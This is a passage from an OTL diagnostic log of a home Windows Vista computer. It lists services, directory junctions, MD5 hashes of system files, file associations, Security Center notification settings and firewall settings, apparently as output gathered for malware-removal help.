SRV - [2009/04/11 02:28:10 | 001,055,232 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\VSSVC.exe -- (VSS)
SRV - [2009/04/11 02:28:18 | 000,315,392 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\audiosrv.dll -- (Audiosrv)
SRV - [2009/04/11 02:28:18 | 000,315,392 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\audiosrv.dll -- (AudioEndpointBuilder)
SRV - [2008/01/19 03:36:20 | 000,104,960 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\sdrsvc.dll -- (SDRSVC)
SRV - [2008/01/19 03:38:24 | 000,272,952 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend)
SRV - [2009/04/11 02:28:25 | 001,017,856 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\wevtsvc.dll -- (Eventlog)
SRV - [2009/04/11 02:28:20 | 000,407,552 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\MPSSVC.dll -- (MpsSvc)
SRV - [2009/04/11 02:28:25 | 000,453,120 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\wiaservc.dll -- (stisvc)
SRV - [2009/04/11 02:27:45 | 000,073,216 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\msiexec.exe -- (msiserver)
SRV - [2009/04/11 02:28:25 | 000,162,304 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\System32\wbem\WMIsvc.dll -- (Winmgmt)
SRV - [2012/06/02 18:19:17 | 001,933,848 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\wuaueng.dll -- (wuauserv)
SRV - [2009/04/11 02:28:18 | 000,175,616 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\dot3svc.dll -- (dot3svc)
SRV - [2009/07/11 15:01:42 | 000,513,536 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\wlansvc.dll -- (Wlansvc)
SRV - [2009/06/10 07:42:23 | 000,160,256 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\wkssvc.dll -- (LanmanWorkstation)
 
< %SYSTEMDRIVE%\*.exe >
[2007/11/07 09:03:18 | 000,562,688 | ---- | M] (Microsoft Corporation) -- C:\install.exe
 
< dir "%systemdrive%\*" /S /A:L /C >
 Volume in drive C is ACER
 Volume Serial Number is 609A-69D2
 Directory of C:\
11/02/2006  09:02 AM    <JUNCTION>     Documents and Settings [C:\Users]
               0 File(s)              0 bytes
 Directory of C:\ProgramData
11/02/2006  09:02 AM    <JUNCTION>     Application Data [C:\ProgramData]
11/02/2006  09:02 AM    <JUNCTION>     Desktop [C:\Users\Public\Desktop]
11/02/2006  09:02 AM    <JUNCTION>     Documents [C:\Users\Public\Documents]
11/02/2006  09:02 AM    <JUNCTION>     Favorites [C:\Users\Public\Favorites]
11/02/2006  09:02 AM    <JUNCTION>     Start Menu [C:\ProgramData\Microsoft\Windows\Start Menu]
11/02/2006  09:02 AM    <JUNCTION>     Templates [C:\ProgramData\Microsoft\Windows\Templates]
               0 File(s)              0 bytes
 Directory of C:\Users
11/02/2006  09:02 AM    <SYMLINKD>     All Users [C:\ProgramData]
11/02/2006  09:02 AM    <JUNCTION>     Default User [C:\Users\Default]
               0 File(s)              0 bytes
 Directory of C:\Users\All Users
11/02/2006  09:02 AM    <JUNCTION>     Application Data [C:\ProgramData]
11/02/2006  09:02 AM    <JUNCTION>     Desktop [C:\Users\Public\Desktop]
11/02/2006  09:02 AM    <JUNCTION>     Documents [C:\Users\Public\Documents]
11/02/2006  09:02 AM    <JUNCTION>     Favorites [C:\Users\Public\Favorites]
11/02/2006  09:02 AM    <JUNCTION>     Start Menu [C:\ProgramData\Microsoft\Windows\Start Menu]
11/02/2006  09:02 AM    <JUNCTION>     Templates [C:\ProgramData\Microsoft\Windows\Templates]
               0 File(s)              0 bytes
 Directory of C:\Users\Default
11/02/2006  09:02 AM    <JUNCTION>     Application Data [C:\Users\Default\AppData\Roaming]
11/02/2006  09:02 AM    <JUNCTION>     Cookies [C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies]
11/02/2006  09:02 AM    <JUNCTION>     Local Settings [C:\Users\Default\AppData\Local]
11/02/2006  09:02 AM    <JUNCTION>     My Documents [C:\Users\Default\Documents]
11/02/2006  09:02 AM    <JUNCTION>     NetHood [C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts]
11/02/2006  09:02 AM    <JUNCTION>     PrintHood [C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts]
11/02/2006  09:02 AM    <JUNCTION>     Recent [C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent]
11/02/2006  09:02 AM    <JUNCTION>     SendTo [C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo]
11/02/2006  09:02 AM    <JUNCTION>     Start Menu [C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu]
11/02/2006  09:02 AM    <JUNCTION>     Templates [C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates]
               0 File(s)              0 bytes
 Directory of C:\Users\Default\AppData\Local
11/02/2006  09:02 AM    <JUNCTION>     Application Data [C:\Users\Default\AppData\Local]
11/02/2006  09:02 AM    <JUNCTION>     History [C:\Users\Default\AppData\Local\Microsoft\Windows\History]
11/02/2006  09:02 AM    <JUNCTION>     Temporary Internet Files [C:\Users\Default\AppData\Local\Microsoft\Windows\Temporary Internet Files]
               0 File(s)              0 bytes
 Directory of C:\Users\Default\Documents
11/02/2006  09:02 AM    <JUNCTION>     My Music [C:\Users\Default\Music]
11/02/2006  09:02 AM    <JUNCTION>     My Pictures [C:\Users\Default\Pictures]
11/02/2006  09:02 AM    <JUNCTION>     My Videos [C:\Users\Default\Videos]
               0 File(s)              0 bytes
 Directory of C:\Users\Ken
12/04/2007  11:33 AM    <JUNCTION>     Application Data [C:\Users\Ken\AppData\Roaming]
12/04/2007  11:33 AM    <JUNCTION>     Cookies [C:\Users\Ken\AppData\Roaming\Microsoft\Windows\Cookies]
12/04/2007  11:33 AM    <JUNCTION>     Local Settings [C:\Users\Ken\AppData\Local]
12/04/2007  11:33 AM    <JUNCTION>     My Documents [C:\Users\Ken\Documents]
12/04/2007  11:33 AM    <JUNCTION>     NetHood [C:\Users\Ken\AppData\Roaming\Microsoft\Windows\Network Shortcuts]
12/04/2007  11:33 AM    <JUNCTION>     PrintHood [C:\Users\Ken\AppData\Roaming\Microsoft\Windows\Printer Shortcuts]
12/04/2007  11:33 AM    <JUNCTION>     Recent [C:\Users\Ken\AppData\Roaming\Microsoft\Windows\Recent]
12/04/2007  11:33 AM    <JUNCTION>     SendTo [C:\Users\Ken\AppData\Roaming\Microsoft\Windows\SendTo]
12/04/2007  11:33 AM    <JUNCTION>     Start Menu [C:\Users\Ken\AppData\Roaming\Microsoft\Windows\Start Menu]
12/04/2007  11:33 AM    <JUNCTION>     Templates [C:\Users\Ken\AppData\Roaming\Microsoft\Windows\Templates]
               0 File(s)              0 bytes
 Directory of C:\Users\Ken\AppData\Local
12/04/2007  11:33 AM    <JUNCTION>     Application Data [C:\Users\Ken\AppData\Local]
12/04/2007  11:33 AM    <JUNCTION>     History [C:\Users\Ken\AppData\Local\Microsoft\Windows\History]
12/04/2007  11:33 AM    <JUNCTION>     Temporary Internet Files [C:\Users\Ken\AppData\Local\Microsoft\Windows\Temporary Internet Files]
               0 File(s)              0 bytes
 Directory of C:\Users\Ken\AppData\LocalLow
02/03/2013  12:36 AM    <JUNCTION>     PlayReady [C:\ProgramData\Microsoft\PlayReady]
               0 File(s)              0 bytes
 Directory of C:\Users\Ken\Documents
12/04/2007  11:33 AM    <JUNCTION>     My Music [C:\Users\Ken\Music]
12/04/2007  11:33 AM    <JUNCTION>     My Pictures [C:\Users\Ken\Pictures]
12/04/2007  11:33 AM    <JUNCTION>     My Videos [C:\Users\Ken\Videos]
               0 File(s)              0 bytes
 Directory of C:\Users\Public\Documents
11/02/2006  09:02 AM    <JUNCTION>     My Music [C:\Users\Public\Music]
11/02/2006  09:02 AM    <JUNCTION>     My Pictures [C:\Users\Public\Pictures]
11/02/2006  09:02 AM    <JUNCTION>     My Videos [C:\Users\Public\Videos]
               0 File(s)              0 bytes
 Directory of C:\Users\UpdatusUser
08/02/2011  11:51 AM    <JUNCTION>     Application Data [C:\Users\UpdatusUser\AppData\Roaming]
08/02/2011  11:51 AM    <JUNCTION>     Cookies [C:\Users\UpdatusUser\AppData\Roaming\Microsoft\Windows\Cookies]
08/02/2011  11:51 AM    <JUNCTION>     Local Settings [C:\Users\UpdatusUser\AppData\Local]
08/02/2011  11:51 AM    <JUNCTION>     My Documents [C:\Users\UpdatusUser\Documents]
08/02/2011  11:51 AM    <JUNCTION>     NetHood [C:\Users\UpdatusUser\AppData\Roaming\Microsoft\Windows\Network Shortcuts]
08/02/2011  11:51 AM    <JUNCTION>     PrintHood [C:\Users\UpdatusUser\AppData\Roaming\Microsoft\Windows\Printer Shortcuts]
08/02/2011  11:51 AM    <JUNCTION>     Recent [C:\Users\UpdatusUser\AppData\Roaming\Microsoft\Windows\Recent]
08/02/2011  11:51 AM    <JUNCTION>     SendTo [C:\Users\UpdatusUser\AppData\Roaming\Microsoft\Windows\SendTo]
08/02/2011  11:51 AM    <JUNCTION>     Start Menu [C:\Users\UpdatusUser\AppData\Roaming\Microsoft\Windows\Start Menu]
08/02/2011  11:51 AM    <JUNCTION>     Templates [C:\Users\UpdatusUser\AppData\Roaming\Microsoft\Windows\Templates]
               0 File(s)              0 bytes
 Directory of C:\Users\UpdatusUser\AppData\Local
08/02/2011  11:51 AM    <JUNCTION>     Application Data [C:\Users\UpdatusUser\AppData\Local]
08/02/2011  11:51 AM    <JUNCTION>     History [C:\Users\UpdatusUser\AppData\Local\Microsoft\Windows\History]
08/02/2011  11:51 AM    <JUNCTION>     Temporary Internet Files [C:\Users\UpdatusUser\AppData\Local\Microsoft\Windows\Temporary Internet Files]
               0 File(s)              0 bytes
 Directory of C:\Users\UpdatusUser\Documents
08/02/2011  11:51 AM    <JUNCTION>     My Music [C:\Users\UpdatusUser\Music]
08/02/2011  11:51 AM    <JUNCTION>     My Pictures [C:\Users\UpdatusUser\Pictures]
08/02/2011  11:51 AM    <JUNCTION>     My Videos [C:\Users\UpdatusUser\Videos]
               0 File(s)              0 bytes
 Directory of C:\Windows\System32\config\systemprofile
11/29/2008  10:00 AM    <JUNCTION>     Application Data [C:\Windows\system32\config\systemprofile\AppData\Roaming]
11/29/2008  10:00 AM    <JUNCTION>     Cookies [C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Cookies]
11/29/2008  10:00 AM    <JUNCTION>     Local Settings [C:\Windows\system32\config\systemprofile\AppData\Local]
11/29/2008  10:00 AM    <JUNCTION>     My Documents [C:\Windows\system32\config\systemprofile\Documents]
11/29/2008  10:00 AM    <JUNCTION>     NetHood [C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Network Shortcuts]
11/29/2008  10:00 AM    <JUNCTION>     PrintHood [C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Printer Shortcuts]
11/29/2008  10:00 AM    <JUNCTION>     Recent [C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Recent]
11/29/2008  10:00 AM    <JUNCTION>     SendTo [C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\SendTo]
11/29/2008  10:00 AM    <JUNCTION>     Start Menu [C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu]
11/29/2008  10:00 AM    <JUNCTION>     Templates [C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Templates]
               0 File(s)              0 bytes
 Directory of C:\Windows\System32\config\systemprofile\AppData\Local
11/29/2008  10:00 AM    <JUNCTION>     Application Data [C:\Windows\system32\config\systemprofile\AppData\Local]
11/29/2008  10:00 AM    <JUNCTION>     History [C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\History]
11/29/2008  10:00 AM    <JUNCTION>     Temporary Internet Files [C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files]
               0 File(s)              0 bytes
 Directory of C:\Windows\System32\config\systemprofile\Documents
11/29/2008  10:00 AM    <JUNCTION>     My Music [C:\Windows\system32\config\systemprofile\Music]
11/29/2008  10:00 AM    <JUNCTION>     My Pictures [C:\Windows\system32\config\systemprofile\Pictures]
11/29/2008  10:00 AM    <JUNCTION>     My Videos [C:\Windows\system32\config\systemprofile\Videos]
               0 File(s)              0 bytes
     Total Files Listed:
               0 File(s)              0 bytes
              83 Dir(s)  54,476,492,800 bytes free
 
< MD5 for: EXPLORER.EXE  >
[2008/10/29 02:20:29 | 002,923,520 | ---- | M] (Microsoft Corporation) MD5=37440D09DEAE0B672A04DCCF7ABF06BE -- C:\Windows\winsxs\x86_microsoft-windows-explorer_31bf3856ad364e35_6.0.6000.16771_none_4f83bb287ccdb7e3\explorer.exe
[2008/10/29 02:29:41 | 002,927,104 | ---- | M] (Microsoft Corporation) MD5=4F554999D7D5F05DAAEBBA7B5BA1089D -- C:\Windows\winsxs\x86_microsoft-windows-explorer_31bf3856ad364e35_6.0.6001.18164_none_5177ca9879e978e8\explorer.exe
[2008/10/29 23:59:17 | 002,927,616 | ---- | M] (Microsoft Corporation) MD5=50BA5850147410CDE89C523AD3BC606E -- C:\Windows\winsxs\x86_microsoft-windows-explorer_31bf3856ad364e35_6.0.6001.22298_none_51e4f8c7931bd1e1\explorer.exe
[2007/12/04 13:29:22 | 002,923,520 | ---- | M] (Microsoft Corporation) MD5=6D06CD98D954FE87FB2DB8108793B399 -- C:\Windows\winsxs\x86_microsoft-windows-explorer_31bf3856ad364e35_6.0.6000.16549_none_4fac29707cae347a\explorer.exe
[2007/12/04 13:29:21 | 002,923,520 | ---- | M] (Microsoft Corporation) MD5=BD06F0BF753BC704B653C3A50F89D362 -- C:\Windows\winsxs\x86_microsoft-windows-explorer_31bf3856ad364e35_6.0.6000.20668_none_501f261995dcf2cf\explorer.exe
[2009/04/11 02:27:36 | 002,926,592 | ---- | M] (Microsoft Corporation) MD5=D07D4C3038F3578FFCE1C0237F2A1253 -- C:\Windows\explorer.exe
[2009/04/11 02:27:36 | 002,926,592 | ---- | M] (Microsoft Corporation) MD5=D07D4C3038F3578FFCE1C0237F2A1253 -- C:\Windows\winsxs\x86_microsoft-windows-explorer_31bf3856ad364e35_6.0.6002.18005_none_53a0201e76de3a0b\explorer.exe
[2008/10/27 22:15:02 | 002,923,520 | ---- | M] (Microsoft Corporation) MD5=E7156B0B74762D9DE0E66BDCDE06E5FB -- C:\Windows\winsxs\x86_microsoft-windows-explorer_31bf3856ad364e35_6.0.6000.20947_none_5033cb5995cd990b\explorer.exe
[2006/11/02 05:45:07 | 002,923,520 | ---- | M] (Microsoft Corporation) MD5=FD8C53FB002217F6F888BCF6F5D7084D -- C:\Windows\winsxs\x86_microsoft-windows-explorer_31bf3856ad364e35_6.0.6000.16386_none_4f7de5167cd15deb\explorer.exe
[2008/01/19 03:33:10 | 002,927,104 | ---- | M] (Microsoft Corporation) MD5=FFA764631CB70A30065C12EF8E174F9F -- C:\Windows\winsxs\x86_microsoft-windows-explorer_31bf3856ad364e35_6.0.6001.18000_none_51b4a71279bc6ebf\explorer.exe
 
< MD5 for: SERVICES  >
[2006/09/18 17:41:30 | 000,017,244 | ---- | M] () MD5=9F534244B7F8F55D5C0BB498D8D481E7 -- C:\Windows\System32\drivers\etc\services
[2006/09/18 17:41:30 | 000,017,244 | ---- | M] () MD5=9F534244B7F8F55D5C0BB498D8D481E7 -- C:\Windows\winsxs\x86_microsoft-windows-w..nfrastructure-other_31bf3856ad364e35_6.0.6000.16386_none_024e4071fa6fea95\services
 
< MD5 for: SERVICES.CFG  >
[2012/07/27 16:51:34 | 000,586,083 | ---- | M] () MD5=6DE4EA437EC1FE6DB27CADB0A7EA8DC2 -- C:\Program Files\Adobe\Reader 10.0\Reader\Services\Services.cfg
[2011/06/06 12:55:30 | 000,584,045 | R--- | M] () MD5=B82DD53FA8C260DDD7FDC42182DB816E -- C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744AA0100000010\10.1.0\services.cfg
 
< MD5 for: SERVICES.DAT  >
[2014/04/06 00:32:27 | 000,004,173 | ---- | M] () MD5=ED018DB6916ACAB46011A330B4B116AA -- C:\Users\Ken\AppData\Local\Temp\jrt\services.dat
 
< MD5 for: SERVICES.EXE  >
[2008/01/19 03:33:28 | 000,279,040 | ---- | M] (Microsoft Corporation) MD5=2B336AB6286D6C81FA02CBAB914E3C6C -- C:\Windows\winsxs\x86_microsoft-windows-s..s-servicecontroller_31bf3856ad364e35_6.0.6001.18000_none_cf5fc067cd49010a\services.exe
[2006/11/02 05:45:40 | 000,279,552 | ---- | M] (Microsoft Corporation) MD5=329CF3C97CE4C19375C8ABCABAE258B0 -- C:\Windows\winsxs\x86_microsoft-windows-s..s-servicecontroller_31bf3856ad364e35_6.0.6000.16386_none_cd28fe6bd05df036\services.exe
[2009/04/11 02:27:59 | 000,279,552 | ---- | M] (Microsoft Corporation) MD5=D4E6D91C1349B7BFB3599A6ADA56851B -- C:\Windows\System32\services.exe
[2009/04/11 02:27:59 | 000,279,552 | ---- | M] (Microsoft Corporation) MD5=D4E6D91C1349B7BFB3599A6ADA56851B -- C:\Windows\winsxs\x86_microsoft-windows-s..s-servicecontroller_31bf3856ad364e35_6.0.6002.18005_none_d14b3973ca6acc56\services.exe
 
< MD5 for: SERVICES.EXE.MUI  >
[2006/11/02 08:40:53 | 000,017,920 | ---- | M] (Microsoft Corporation) MD5=1626EACF0E7E59F85C59DDDD27C4169C -- C:\Windows\System32\en-US\services.exe.mui
[2006/11/02 08:40:53 | 000,017,920 | ---- | M] (Microsoft Corporation) MD5=1626EACF0E7E59F85C59DDDD27C4169C -- C:\Windows\winsxs\x86_microsoft-windows-s..ontroller.resources_31bf3856ad364e35_6.0.6000.16386_en-us_67c6851b290a1ced\services.exe.mui
 
< MD5 for: SERVICES.HTML  >
[2012/05/30 20:13:28 | 000,109,895 | ---- | M] () MD5=27C527CBCA5F2A406A8705400A044C5C -- C:\Program Files\Android\android-sdk\docs\guide\topics\fundamentals\services.html
 
< MD5 for: SERVICES.JAVA  >
[2012/05/30 20:18:47 | 000,006,748 | R--- | M] () MD5=411111AD775B441DDCC5D4EFF612F591 -- C:\Program Files\Android\android-sdk\sources\android-15\org\apache\harmony\security\fortress\Services.java
 
< MD5 for: SERVICES.LNK  >
[2008/07/23 21:09:37 | 000,001,688 | ---- | M] () MD5=9DAC3570347729E7C8C232434BB52828 -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\services.lnk
[2008/07/23 21:09:37 | 000,001,688 | ---- | M] () MD5=9DAC3570347729E7C8C232434BB52828 -- C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\services.lnk
 
< MD5 for: SERVICES.MOF  >
[2006/09/18 17:46:11 | 000,002,866 | ---- | M] () MD5=26A11C895A7F0B6D32105EBE127D8500 -- C:\Windows\System32\wbem\services.mof
[2006/09/18 17:46:11 | 000,002,866 | ---- | M] () MD5=26A11C895A7F0B6D32105EBE127D8500 -- C:\Windows\winsxs\x86_microsoft-windows-s..s-servicecontroller_31bf3856ad364e35_6.0.6000.16386_none_cd28fe6bd05df036\services.mof
[2006/09/18 17:46:11 | 000,002,866 | ---- | M] () MD5=26A11C895A7F0B6D32105EBE127D8500 -- C:\Windows\winsxs\x86_microsoft-windows-s..s-servicecontroller_31bf3856ad364e35_6.0.6001.18000_none_cf5fc067cd49010a\services.mof
[2006/09/18 17:46:11 | 000,002,866 | ---- | M] () MD5=26A11C895A7F0B6D32105EBE127D8500 -- C:\Windows\winsxs\x86_microsoft-windows-s..s-servicecontroller_31bf3856ad364e35_6.0.6002.18005_none_d14b3973ca6acc56\services.mof
 
< MD5 for: SERVICES.MSC  >
[2006/11/02 08:41:29 | 000,092,745 | ---- | M] () MD5=7A1D35F59468B8118AF5B8E21DF78AE2 -- C:\Windows\System32\en-US\services.msc
[2006/09/18 17:29:40 | 000,092,745 | ---- | M] () MD5=7A1D35F59468B8118AF5B8E21DF78AE2 -- C:\Windows\System32\services.msc
[2006/11/02 08:41:29 | 000,092,745 | ---- | M] () MD5=7A1D35F59468B8118AF5B8E21DF78AE2 -- C:\Windows\winsxs\x86_microsoft-windows-s..cessnapin.resources_31bf3856ad364e35_6.0.6000.16386_en-us_a2085506ff73b6e0\services.msc
[2006/09/18 17:29:40 | 000,092,745 | ---- | M] () MD5=7A1D35F59468B8118AF5B8E21DF78AE2 -- C:\Windows\winsxs\x86_microsoft-windows-servicessnapin_31bf3856ad364e35_6.0.6000.16386_none_cd2d20a848cfd40f\services.msc
[2006/09/18 17:29:40 | 000,092,745 | ---- | M] () MD5=7A1D35F59468B8118AF5B8E21DF78AE2 -- C:\Windows\winsxs\x86_microsoft-windows-servicessnapin_31bf3856ad364e35_6.0.6001.18000_none_cf63e2a445bae4e3\services.msc
 
< MD5 for: SERVICES.SBS  >
[2013/07/16 12:21:30 | 000,034,818 | ---- | M] () MD5=E2ACBC77020C8D5CE97CA61D0D859A44 -- C:\Program Files\Spybot - Search & Destroy\Includes\Services.sbs
 
< MD5 for: SVCHOST.EXE  >
[2006/11/02 05:45:47 | 000,022,016 | ---- | M] (Microsoft Corporation) MD5=10DA15933D582D2FEDCF705EFE394B09 -- C:\Windows\winsxs\x86_microsoft-windows-services-svchost_31bf3856ad364e35_6.0.6000.16386_none_b38497a50862ad11\svchost.exe
[2008/01/19 03:33:32 | 000,021,504 | ---- | M] (Microsoft Corporation) MD5=3794B461C45882E06856F282EEF025AF -- C:\Windows\System32\svchost.exe
[2008/01/19 03:33:32 | 000,021,504 | ---- | M] (Microsoft Corporation) MD5=3794B461C45882E06856F282EEF025AF -- C:\Windows\winsxs\x86_microsoft-windows-services-svchost_31bf3856ad364e35_6.0.6001.18000_none_b5bb59a1054dbde5\svchost.exe
[2013/04/04 14:50:32 | 000,218,184 | ---- | M] () MD5=B4C6E3889BB310CA7E974A04EC6E46AC -- C:\Program Files\Malwarebytes' Anti-Malware\Chameleon\svchost.exe
 
< MD5 for: USERINIT.EXE  >
[2008/01/19 03:33:33 | 000,025,088 | ---- | M] (Microsoft Corporation) MD5=0E135526E9785D085BCD9AEDE6FBCBF9 -- C:\Windows\System32\userinit.exe
[2008/01/19 03:33:33 | 000,025,088 | ---- | M] (Microsoft Corporation) MD5=0E135526E9785D085BCD9AEDE6FBCBF9 -- C:\Windows\winsxs\x86_microsoft-windows-userinit_31bf3856ad364e35_6.0.6001.18000_none_dc28ba15d1aff80b\userinit.exe
[2006/11/02 05:45:50 | 000,024,576 | ---- | M] (Microsoft Corporation) MD5=22027835939F86C3E47AD8E3FBDE3D11 -- C:\Windows\winsxs\x86_microsoft-windows-userinit_31bf3856ad364e35_6.0.6000.16386_none_d9f1f819d4c4e737\userinit.exe
 
< MD5 for: WINLOGON.EXE  >
[2009/04/11 02:28:13 | 000,314,368 | ---- | M] (Microsoft Corporation) MD5=898E7C06A350D4A1A64A9EA264D55452 -- C:\Windows\System32\winlogon.exe
[2009/04/11 02:28:13 | 000,314,368 | ---- | M] (Microsoft Corporation) MD5=898E7C06A350D4A1A64A9EA264D55452 -- C:\Windows\winsxs\x86_microsoft-windows-winlogon_31bf3856ad364e35_6.0.6002.18005_none_71ae7a22d2134741\winlogon.exe
[2006/11/02 05:45:57 | 000,308,224 | ---- | M] (Microsoft Corporation) MD5=9F75392B9128A91ABAFB044EA350BAAD -- C:\Windows\winsxs\x86_microsoft-windows-winlogon_31bf3856ad364e35_6.0.6000.16386_none_6d8c3f1ad8066b21\winlogon.exe
[2013/04/04 14:50:32 | 000,218,184 | ---- | M] () MD5=B4C6E3889BB310CA7E974A04EC6E46AC -- C:\Program Files\Malwarebytes' Anti-Malware\Chameleon\winlogon.exe
[2008/01/19 03:33:37 | 000,314,880 | ---- | M] (Microsoft Corporation) MD5=C2610B6BDBEFC053BBDAB4F1B965CB24 -- C:\Windows\winsxs\x86_microsoft-windows-winlogon_31bf3856ad364e35_6.0.6001.18000_none_6fc30116d4f17bf5\winlogon.exe
 
========== Alternate Data Streams ==========
 
@Alternate Data Stream - 104 bytes -> C:\ProgramData\TEMP:5C321E34

< End of report >
 

OTL Extras logfile created on: 5/20/2014 2:17:11 PM - Run 4
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\Ken\Desktop
Windows Vista Home Premium Edition Service Pack 2 (Version = 6.0.6002) - Type = NTWorkstation
Internet Explorer (Version = 9.0.8112.16421)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy
 
3.00 Gb Total Physical Memory | 1.73 Gb Available Physical Memory | 57.84% Memory free
6.20 Gb Paging File | 4.72 Gb Available in Paging File | 76.12% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files
Drive C: | 111.69 Gb Total Space | 51.32 Gb Free Space | 45.95% Space Free | Partition Type: NTFS
Drive D: | 111.43 Gb Total Space | 35.69 Gb Free Space | 32.03% Space Free | Partition Type: NTFS
Drive F: | 74.53 Gb Total Space | 29.77 Gb Free Space | 39.95% Space Free | Partition Type: NTFS
 
Computer Name: KEN-HOME | User Name: Ken | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days
 
========== Extra Registry (SafeList) ==========
 
 
========== File Associations ==========
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.cpl [@ = cplfile] -- C:\Windows\System32\control.exe (Microsoft Corporation)
.hlp [@ = hlpfile] -- C:\Windows\winhlp32.exe (Microsoft Corporation)
.html [@ = FirefoxHTML] -- C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation)
 
========== Shell Spawning ==========
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
cplfile [cplopen] -- %SystemRoot%\System32\control.exe "%1",%* (Microsoft Corporation)
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
hlpfile [open] -- %SystemRoot%\winhlp32.exe %1 (Microsoft Corporation)
htmlfile [edit] -- Reg Error: Key error.
htmlfile [print] -- rundll32.exe %windir%\system32\mshtml.dll,PrintHTML "%1"
http [open] -- "C:\Program Files\Mozilla Firefox\firefox.exe" -requestPending -osint -url "%1" (Mozilla Corporation)
https [open] -- "C:\Program Files\Mozilla Firefox\firefox.exe" -requestPending -osint -url "%1" (Mozilla Corporation)
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Directory [runas] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Folder [open] -- %SystemRoot%\Explorer.exe /separate,/idlist,%I,%L (Microsoft Corporation)
Folder [explore] -- %SystemRoot%\Explorer.exe /separate,/e,/idlist,%I,%L (Microsoft Corporation)
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
 
========== Security Center Settings ==========
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"cval" = 1
"UacDisableNotify" = 1
"InternetSettingsDisableNotify" = 1
"AutoUpdateDisableNotify" = 1
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]
"DisableMonitoring" = 1
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecAntiVirus]
"DisableMonitoring" = 1
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecFirewall]
"DisableMonitoring" = 1
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]
"AntiVirusOverride" = 0
"AntiSpywareOverride" = 0
"FirewallOverride" = 0
"VistaSp1" = Reg Error: Unknown registry data type -- File not found
"VistaSp2" = Reg Error: Unknown registry data type -- File not found
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc\Vol]
 
========== Firewall Settings ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
"DisableNotifications" = 0
"EnableFirewall" = 1
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DisableNotifications" = 0
"EnableFirewall" = 1
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile]
"DisableNotifications" = 0
"EnableFirewall" = 1
 
========== Authorized Applications List ==========
 
 
========== Vista Active Open Ports Exception List ==========
